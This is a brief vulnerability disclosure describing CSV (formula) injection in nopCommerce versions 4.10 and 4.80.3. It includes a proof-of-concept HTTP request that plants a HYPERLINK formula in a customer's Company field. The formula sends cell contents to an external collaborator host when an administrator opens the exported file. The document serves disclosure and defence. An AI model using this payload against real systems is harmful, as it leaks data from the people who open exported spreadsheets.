nopCommerce versions v4.10 and v4.80.3 are vulnerable to *C*SV Injection
(Formula Injection) when exporting data to CSV. The application does not
properly sanitize user-supplied input before including it in CSV export
files.

An attacker can inject malicious spreadsheet formulas into fields that will
later be exported (for example, order details, product names, or customer
information). When the exported file is opened in spreadsheet software such
as Microsoft Excel or LibreOffice Calc, the injected formula is executed.

POST /Admin/Customer/Edit/4 HTTP/2
Host: <host>
Cookie: ***

save=&Id=4&--snip--Company=%3DHYPERLINK%28%22http%3A%2F%
2F00yjdi594jbbty6hwkuhfssas1ysmtai.oastify.com%3Fdata%3D%22%26A1%26A2%26B2%26C2%26D2%2C+%22Click+me%22%29
--snip--

HTTP/2 200 OK